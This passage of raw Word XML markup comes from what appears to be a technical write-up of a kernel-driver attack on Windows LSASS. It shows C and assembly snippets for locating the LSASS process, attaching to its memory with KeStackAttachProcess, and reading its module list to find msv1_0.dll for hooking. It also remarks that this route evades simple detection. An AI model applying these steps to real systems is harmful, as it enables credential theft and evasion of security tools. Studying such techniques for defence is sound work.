          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t xml:space="preserve">while </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CurrentProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>SystemProc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA9BDA4" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Extract Process Handle &amp; PID </w:t>
      </w:r>
      <w:r>
        <w:t>Once the EPROCESS is found, extract the Process ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CDCF8D2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="276" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">HANDLE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>LsassPID</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PsGetProcessId</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TargetProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54426BA0" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="126" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1471" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.2 Context Switching: Accessing Another Process’ Memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327C314" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="271"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This is the critical step that enables the entire attack. By default, a kernel driver operates in its own memory context and cannot directly read/write another process’ virtual memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77738398" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 The Problem: Virtual Address Space Isolation </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Each process in modern operating systems has its own virtual address space. Virtual addresses are translated to physical addresses using a page table, and the page table base address is stored in the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">CR3 register </w:t>
      </w:r>
      <w:r>
        <w:t>(Page Directory Base Register).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258C5A4D" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When a context switch occurs (one process </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>preempted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> for another), the CPU updates CR3 to point to the new process’ page tables. This is how Windows prevents one process from accessing another process’ memory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14710E06" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Process A (CR3 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PageTableA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5033ABAF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="233" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Virtual Address 0x40000000 → Physical Address 0x100000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E388E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Process B (CR3 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PageTableB</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DC9392" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="114" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Virtual Address 0x40000000 → Physical Address 0x500000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41164F23" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="270"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>Without changing CR3, the driver cannot directly address LSASS memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE6B860" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="112" w:line="261" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="1708" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
        <w:t>Solution:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>KeStackAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>provides a</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>kernel</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>specifically</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>purpose—</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeStackAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>on older systems):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213BF95E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">KAPC_STATE </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DA515C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>KeStackAttachProcess</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TargetProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>, &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166FF178" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8F412A" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Now we are in LSASS' address space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C3C76B" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Virtual addresses resolve to LSASS' physical memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C62193" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="235" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// We can read/write LSASS memory directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5602C5BD" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="455" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Perform hooking and patching here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4368CC7C" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26798F4F" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="373" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="4561" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>KeUnstackDetachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>(&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ApcState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">); </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>What does this do internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207B9082" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve">; Pseudocode of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>KeStackAttachProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F6397A7" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007F00"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>, [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>rcx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>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EPROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DirectoryTableBase</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Get page table from EPROCESS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007F00"/>
        </w:rPr>
        <w:t xml:space="preserve">mov </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>cr3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:t>rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="007021"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Switch page table (context switch)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDC5FF" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="116" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>; Now all memory accesses use the target process' address space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D61A9CC" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="275"/>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:t>This is a legitimate kernel mechanism—it is used by debuggers, profilers, and administrative tools that need to access another process’ memory. By using the legitimate API rather than directly manipulating CR3, the attack avoids some trivial detection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBA8A2" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="14" w:right="1767"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 Reading the Target Process’ Module List </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Once attached to LSASS’ address space, the driver can read the Process Environment Block (PEB) and Module List to locate </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>msv1_0.dll</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18415187" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="238" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PPEB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>Peb</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PsGetProcessPeb</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TargetProcess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666666"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE1797E" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="4" w:line="258" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:i/>
          <w:color w:val="61A1B0"/>
        </w:rPr>
        <w:t>// Read PEB fields while attached to LSASS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10FE9B43" w14:textId="77777777" w:rsidR="00FC7A97" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="3" w:line="260" w:lineRule="auto"/>
        <w:ind w:left="22" w:right="0" w:hanging="10"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">PLIST_ENTRY </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
